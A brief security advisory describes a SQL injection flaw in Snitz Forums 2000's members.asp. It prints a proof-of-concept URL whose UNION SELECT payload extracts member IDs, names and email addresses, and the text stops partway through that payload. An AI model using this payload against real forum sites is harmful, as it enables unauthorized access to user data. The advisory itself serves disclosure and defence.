|
Snitz Forums 2000 Members.ASP SQL Injection Vulnerability
This may be exploited with a web browser. The following proof-of-concept was provided: Normally, to view the members' list whose membername start with 'A', members.asp page is used as the following: /members.asp? mode=search&M_NAME=A&initial=1&method= Use this link to view the vulnerability: /members.asp?mode=search&M_NAME=XXXX% 25')%20UNION%20SELECT%20MEMBER_ID,% 20M_STATUS,%20M_NAME%20%2B%20'/'%20% 2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,% |
|
 Privacy Statement |
